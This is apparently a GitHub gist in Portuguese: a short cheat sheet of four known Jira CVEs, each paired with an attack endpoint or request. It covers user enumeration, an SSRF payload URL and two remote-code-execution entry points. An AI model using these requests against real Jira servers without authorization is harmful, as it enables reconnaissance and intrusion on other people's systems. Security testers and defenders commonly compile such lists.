Skip to content

Instantly share code, notes, and snippets.

@BigCr0C
BigCr0C / common jira vulnerabilities.txt
Last active November 14, 2023 18:15
common jira vulnerabilities
=== Vulnerabilidades mais comuns no Jira ===
CVE-2019-8449 Enumeração de usuários: /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
>>==============================<<
CVE-2019-8451 SSRF: /plugins/servlet/gadgets/makeRequest?url=https://victimhost:1337@example.com
>>==============================<<
CVE-2019–11581: RCE: /secure/ContactAdministrators!default.jspa
>>==============================<<
CVE-2019-3396 RCE: POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: JIRA ...